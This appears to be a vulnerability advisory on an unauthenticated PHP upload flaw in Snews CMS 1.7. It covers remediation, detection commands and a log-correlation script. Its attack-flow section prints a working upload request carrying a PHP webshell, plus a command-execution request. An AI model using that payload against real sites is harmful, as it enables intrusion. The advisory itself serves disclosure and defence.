CVE-2016-20052: Snews CMS 1.7 Unrestricted File Upload Remote Code Execution
A critical unauthenticated remote code execution vulnerability has been formally published to the NIST National Vulnerability Database for Snews CMS 1.7, tracked as CVE-2016-20052 (CVSS 9.8, Critical). The flaw is an unrestricted file upload weakness in the CMS's upload endpoint that allows any unauthenticated attacker to upload arbitrary files — including PHP executables — directly to the snews_files directory, where they can be accessed and executed via the web server.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2016-20052 |
| CVSS Score | 9.8 (Critical) |
| CWE Classification | CWE-434 — Unrestricted Upload of File with Dangerous Type |
| Affected Product | Snews CMS 1.7 |
| Attack Vector | Network — no local access required |
| Privileges Required | None |
| User Interaction | None |
| Authentication | Not required |
| Patch Available | See vendor guidance |
Technical Background
Snews is a lightweight PHP-based content management system used by small websites and blogs. The CMS exposes a multipart form-data file upload endpoint that is intended to allow file attachments but fails to enforce any restrictions on file type, extension, or content. This means an attacker can submit a standard HTTP multipart/form-data POST request with a PHP file as the uploaded payload.
The uploaded file is written directly to the snews_files/ directory, which is web-accessible by default. Once uploaded, the attacker simply navigates to the file path to trigger PHP execution by the web server.
Attack Flow
1. Attacker identifies a Snews CMS 1.7 installation (version detection via HTTP headers, error messages, or source code comments)
2. Attacker crafts a multipart POST request to the upload endpoint:

```http
POST /index.php (or the upload handler path)
Content-Type: multipart/form-data; boundary=--boundary

--boundary
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream

<?php system($_GET['cmd']); ?>
--boundary--
```

3. Server writes shell.php to /snews_files/shell.php (no file type validation, no extension filtering, no content inspection)
4. Attacker accesses the uploaded webshell:

```http
GET /snews_files/shell.php?cmd=whoami
```

5. Web server executes the PHP and returns OS command output
→ Full remote code execution achieved

Why This Is Critical
CWE-434 (Unrestricted Upload of File with Dangerous Type) is one of the most severe web application weaknesses because:
- Zero authentication barrier: No account or session is needed to exploit this vulnerability
- Trivial exploitation: A single crafted HTTP POST request is sufficient to place a PHP webshell
- Immediate RCE: The `snews_files` directory is web-accessible, meaning execution follows upload instantly
- No technical skill required: Basic knowledge of HTTP requests or tools like `curl` is all that is needed
- Persistence: The webshell remains on the server until manually removed, surviving restarts
Scope and Exposure
Any Snews CMS 1.7 installation accessible from the network — whether internally or publicly on the internet — is vulnerable without authentication. Exploiting this vulnerability grants execution privileges equivalent to the web server process account (typically www-data on Linux), which may allow:
- Filesystem traversal beyond the web root
- Credential theft from CMS configuration files (database passwords)
- Lateral movement within the host or network
- Pivot point for further intrusion into backend infrastructure
Remediation
Immediate Steps
Step 1: Remove or upgrade Snews CMS
Snews CMS 1.7 should be considered end-of-life for production use. If the CMS must remain in place, contact the vendor for patches or manually implement upload restrictions.
Step 2: Remove existing uploaded webshells
Audit the snews_files/ directory for unexpected PHP files:

```bash
# Find PHP files in the upload directory
find /var/www/html/snews_files/ -name "*.php" -o -name "*.phtml" -o -name "*.php5"
# List all files with recent modification times
ls -lt /var/www/html/snews_files/ | head -20
```

Step 3: Block PHP execution in the upload directory
Configure the web server to deny script execution within upload directories:

```apache
# Apache — add to .htaccess in snews_files/
<FilesMatch "\.(php|php5|phtml|shtml|cgi)$">
Deny from all
</FilesMatch>
Options -ExecCGI
php_flag engine off
```

```nginx
# nginx — add inside the snews_files location block
location /snews_files/ {
    location ~ \.php$ {
        return 403;
    }
}
```

Two caveats on the Apache snippet: `Deny from all` is the Apache 2.2 directive and works on 2.4 only while mod_access_compat is loaded (the native 2.4 form is `Require all denied`), and `php_flag` is honoured only by mod_php, so on PHP-FPM deployments the upload directory must be excluded from the PHP handler in the server configuration instead. In either case, .htaccess directives take effect only where `AllowOverride` permits them, so verify the rule by requesting a harmless test file in the directory and confirming a 403 rather than executed output.

Step 4: Restrict upload endpoint access
If file uploads are not required from the public internet, restrict the upload endpoint to authenticated users or specific IP ranges at the firewall or web server level.
Detection
```bash
# Check web server access logs for POST requests to the upload endpoint
grep -E "POST.*snews" /var/log/apache2/access.log
# Check for PHP file access in the uploads directory
grep "snews_files.*\.php" /var/log/apache2/access.log
# Find recently modified PHP files in the web root
find /var/www/html/ -name "*.php" -newer /var/www/html/index.php -mtime -7
```

POST requests to the upload handler followed by GET requests to .php files in snews_files/ are strong indicators of exploitation.
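The two greps above find the individual pieces; the indicator the advisory actually describes is their sequence from the same client. The Python below is an added example (not from the advisory or the Snews project) that parses Apache combined-format log lines and reports every request for a PHP-like file under snews_files/, and separately flags those preceded by a POST to a snews endpoint from the same IP within a time window. The five sample log lines are constructed; the install path `/snews/` and the `action=upload` query string are assumptions, since the advisory does not name the upload handler's exact path.

```python
import re
from datetime import datetime

# Apache "combined" access-log line: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# Mirrors the advisory's two greps: POSTs whose path mentions snews, and any
# request for a PHP-like file under snews_files/.
UPLOAD_POST_RE = re.compile(r"snews", re.I)
UPLOAD_DIR_PHP_RE = re.compile(r"/snews_files/[^?\s]*\.(?:php\d?|phtml)(?:\?|$)", re.I)

# Constructed sample log. The /snews/ install path and the upload query string
# are assumptions; the advisory does not name the upload handler's exact path.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:14:02:11 +0000] "GET /snews/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:14:02:19 +0000] "POST /snews/index.php?action=upload HTTP/1.1" 302 0 "-" "curl/8.4.0"
203.0.113.7 - - [10/Mar/2024:14:02:23 +0000] "GET /snews_files/shell.php?cmd=id HTTP/1.1" 200 87 "-" "curl/8.4.0"
198.51.100.4 - - [10/Mar/2024:14:05:00 +0000] "GET /snews_files/report.pdf HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2024:14:06:30 +0000] "GET /snews_files/brochure.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def analyse(lines, window_seconds=3600):
    """Scan log lines for the advisory's exploitation pattern.

    Returns 'php_in_uploads' (every request for a PHP-like file under
    snews_files/, failed ones included, since a 404 still shows intent) and
    'correlated' (those preceded, from the same client IP and within
    window_seconds, by a POST to a snews endpoint: upload then execute).
    """
    last_post = {}          # client IP -> most recent matching POST record
    php_in_uploads = []
    correlated = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and UPLOAD_POST_RE.search(rec["path"]):
            last_post[rec["ip"]] = rec
        elif UPLOAD_DIR_PHP_RE.search(rec["path"]):
            php_in_uploads.append(rec)
            post = last_post.get(rec["ip"])
            if post is not None:
                delta = (rec["ts"] - post["ts"]).total_seconds()
                if 0 <= delta <= window_seconds:
                    correlated.append({
                        "ip": rec["ip"],
                        "upload_request": post["path"],
                        "path": rec["path"],
                        "status": rec["status"],
                        "seconds_after_upload": delta,
                    })
    return {"php_in_uploads": php_in_uploads, "correlated": correlated}


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG.splitlines())
    for hit in result["correlated"]:
        print("upload-then-execute:", hit)
    for rec in result["php_in_uploads"]:
        print("php in snews_files:", rec["ip"], rec["path"], rec["status"])
```

Correlating on client IP is a heuristic: an attacker behind a changing address, or a site behind a reverse proxy that logs the proxy's IP, breaks the pairing, which is why the uncorrelated `php_in_uploads` list is reported as well. A 200 status on a .php request in that directory after Step 3 has been applied means the execution block is not actually in effect.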
Impact Assessment
| Impact Area | Description |
|---|---|
| Remote Code Execution | Arbitrary OS commands via uploaded PHP webshell |
| Data Exfiltration | Access to CMS database credentials and site content |
| Persistence | Uploaded webshell survives server restarts |
| Lateral Movement | Web server process account used as pivot point |
| Exploitation Barrier | Zero — no authentication, single HTTP request |
| Availability | Attacker can delete or modify site files |
Key Takeaways
- CVE-2016-20052 allows unauthenticated RCE in Snews CMS 1.7 via a PHP file uploaded to the publicly accessible `snews_files/` directory
- CVSS 9.8 (Critical) — the absence of any file type validation or authentication requirement makes this trivially exploitable
- Immediate action: Audit the `snews_files/` directory, block PHP execution there, and evaluate upgrading or replacing the CMS
- Restrict the upload endpoint at the network or application layer if public file uploads are not required
- Any Snews CMS 1.7 installation reachable from untrusted networks should be treated as potentially compromised pending audit